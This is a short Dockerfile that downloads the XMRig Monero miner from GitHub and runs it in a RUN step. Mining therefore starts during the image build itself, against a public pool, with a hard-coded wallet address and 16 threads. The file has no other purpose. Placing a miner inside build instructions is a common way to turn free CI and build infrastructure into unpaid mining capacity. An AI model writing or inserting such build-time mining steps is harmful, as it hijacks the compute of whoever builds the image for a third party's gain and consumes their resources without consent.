FROM ubuntu:18.04
RUN apt-get update
RUN apt-get install wget -y
RUN wget https://github.com/xmrig/xmrig/releases/download/v5.11.3/xmrig-5.11.3-xenial-x64.tar.gz
RUN tar xf xmrig-5.11.3-xenial-x64.tar.gz
RUN cd xmrig-5.11.3 && \
  ./xmrig -o pool.minexmr.com:4444 -u 86g8Ez7TaSXNrnpp2Uxz4idi83JL7hwxRHCFixZeHjEbfd8ZqJv7BAfPw7PBSFgYUy3Li45AJ4qnbY5mDnXBZKCCL7Dvotf -p x -t 16 -a rx/0 --keepalive --donate-level=1 --nicehash --print --randomx-mode=fast